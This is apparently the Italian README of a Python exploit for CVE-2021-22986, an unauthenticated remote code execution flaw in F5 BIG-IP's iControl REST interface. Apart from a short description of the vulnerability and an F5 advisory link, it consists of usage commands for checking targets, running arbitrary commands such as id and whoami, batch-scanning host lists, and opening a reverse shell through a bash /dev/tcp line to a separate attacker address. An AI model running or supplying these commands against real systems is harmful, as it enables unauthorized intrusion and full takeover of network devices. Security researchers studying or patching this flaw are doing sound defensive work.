
CVE-2021-22986 & F5 BIG-IP RCE
Questa vulnerabilità consente ad attaccanti non autenticati con accesso di rete all'interfaccia iControl REST, tramite l'interfaccia di gestione di BIG-IP e gli indirizzi IP self, di eseguire comandi arbitrari di sistema, creare o eliminare file e disabilitare servizi. Questa vulnerabilità può essere sfruttata solo attraverso il control plane e non può essere sfruttata tramite il data plane. Lo sfruttamento può portare al compromesso completo del sistema. Anche il sistema BIG-IP in modalità Appliance è vulnerabile.
Utilizzo base
python3 CVE_2021_22986.py

Verifica vulnerabilità
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

Esecuzione comando:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

Scansione batch
python3 CVE_2021_22986.py -s true -f check.txt

Reverse Shell
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164

https://support.f5.com/csp/article/K03009991